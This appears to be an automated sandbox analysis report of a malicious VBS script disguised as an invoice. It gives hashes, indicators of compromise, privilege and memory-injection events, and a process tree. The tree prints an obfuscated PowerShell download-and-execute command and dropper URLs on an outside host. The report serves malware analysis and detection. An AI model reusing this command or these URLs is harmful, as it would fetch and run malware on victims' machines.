Analysis
-
max time kernel
19s -
max time network
18s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
07-01-2021 07:57
Static task
static1
Behavioral task
behavioral1
Sample
invoice-ID3626307348012.vbs
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
General
-
Target
invoice-ID3626307348012.vbs
-
Size
324B
-
MD5
50f7355426061a1952f878e61e072d5e
-
SHA1
90156383d18b6851298d1c68f0cca24f6c7375fe
-
SHA256
a412a3bdf6e8891fa60734b53430db5d0ac8dce28a764fd013dd767614790c45
-
SHA512
959e8b1cc6eb2e4cf8670567f60aa496ae5af2920b40d8fa9e0705058f57e2e4a8dac029af55514c9a20d5fad4fdd951d676dcaecd33795964dee3ff0a3a5d06
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://www.minpic.de/k/bfqj/2ipze/
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 6 1572 mshta.exe 8 1572 mshta.exe 9 1608 powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 1608 powershell.exe Token: SeIncreaseQuotaPrivilege 1608 powershell.exe Token: SeSecurityPrivilege 1608 powershell.exe Token: SeTakeOwnershipPrivilege 1608 powershell.exe Token: SeLoadDriverPrivilege 1608 powershell.exe Token: SeSystemProfilePrivilege 1608 powershell.exe Token: SeSystemtimePrivilege 1608 powershell.exe Token: SeProfSingleProcessPrivilege 1608 powershell.exe Token: SeIncBasePriorityPrivilege 1608 powershell.exe Token: SeCreatePagefilePrivilege 1608 powershell.exe Token: SeBackupPrivilege 1608 powershell.exe Token: SeRestorePrivilege 1608 powershell.exe Token: SeShutdownPrivilege 1608 powershell.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeSystemEnvironmentPrivilege 1608 powershell.exe Token: SeRemoteShutdownPrivilege 1608 powershell.exe Token: SeUndockPrivilege 1608 powershell.exe Token: SeManageVolumePrivilege 1608 powershell.exe Token: 33 1608 powershell.exe Token: 34 1608 powershell.exe Token: 35 1608 powershell.exe Token: SeIncreaseQuotaPrivilege 1608 powershell.exe Token: SeSecurityPrivilege 1608 powershell.exe Token: SeTakeOwnershipPrivilege 1608 powershell.exe Token: SeLoadDriverPrivilege 1608 powershell.exe Token: SeSystemProfilePrivilege 1608 powershell.exe Token: SeSystemtimePrivilege 1608 powershell.exe Token: SeProfSingleProcessPrivilege 1608 powershell.exe Token: SeIncBasePriorityPrivilege 1608 powershell.exe Token: SeCreatePagefilePrivilege 1608 powershell.exe Token: SeBackupPrivilege 1608 powershell.exe Token: SeRestorePrivilege 1608 powershell.exe Token: SeShutdownPrivilege 1608 powershell.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeSystemEnvironmentPrivilege 1608 powershell.exe Token: SeRemoteShutdownPrivilege 1608 powershell.exe Token: SeUndockPrivilege 1608 powershell.exe Token: SeManageVolumePrivilege 1608 powershell.exe Token: 33 1608 powershell.exe Token: 34 1608 powershell.exe Token: 35 1608 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1888 wrote to memory of 1572 1888 WScript.exe 25 PID 1888 wrote to memory of 1572 1888 WScript.exe 25 PID 1888 wrote to memory of 1572 1888 WScript.exe 25 PID 1572 wrote to memory of 1608 1572 mshta.exe 32 PID 1572 wrote to memory of 1608 1572 mshta.exe 32 PID 1572 wrote to memory of 1608 1572 mshta.exe 32 PID 1608 wrote to memory of 1208 1608 powershell.exe 35 PID 1608 wrote to memory of 1208 1608 powershell.exe 35 PID 1608 wrote to memory of 1208 1608 powershell.exe 35 PID 1608 wrote to memory of 1208 1608 powershell.exe 35 PID 1608 wrote to memory of 1168 1608 powershell.exe 39 PID 1608 wrote to memory of 1168 1608 powershell.exe 39 PID 1608 wrote to memory of 1168 1608 powershell.exe 39 PID 1608 wrote to memory of 1168 1608 powershell.exe 39 PID 1608 wrote to memory of 1540 1608 powershell.exe 38 PID 1608 wrote to memory of 1540 1608 powershell.exe 38 PID 1608 wrote to memory of 1540 1608 powershell.exe 38 PID 1608 wrote to memory of 1540 1608 powershell.exe 38 PID 1608 wrote to memory of 1888 1608 powershell.exe 37 PID 1608 wrote to memory of 1888 1608 powershell.exe 37 PID 1608 wrote to memory of 1888 1608 powershell.exe 37 PID 1608 wrote to memory of 1888 1608 powershell.exe 37 PID 1608 wrote to memory of 1756 1608 powershell.exe 36 PID 1608 wrote to memory of 1756 1608 powershell.exe 36 PID 1608 wrote to memory of 1756 1608 powershell.exe 36 PID 1608 wrote to memory of 1756 1608 powershell.exe 36
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice-ID3626307348012.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://www.minpic.de/k/bfqk/14x9vi/2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://www.minpic.de/k/bfqj/2ipze/'))))3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1208
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1756
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1888
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1540
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1168
-
-
-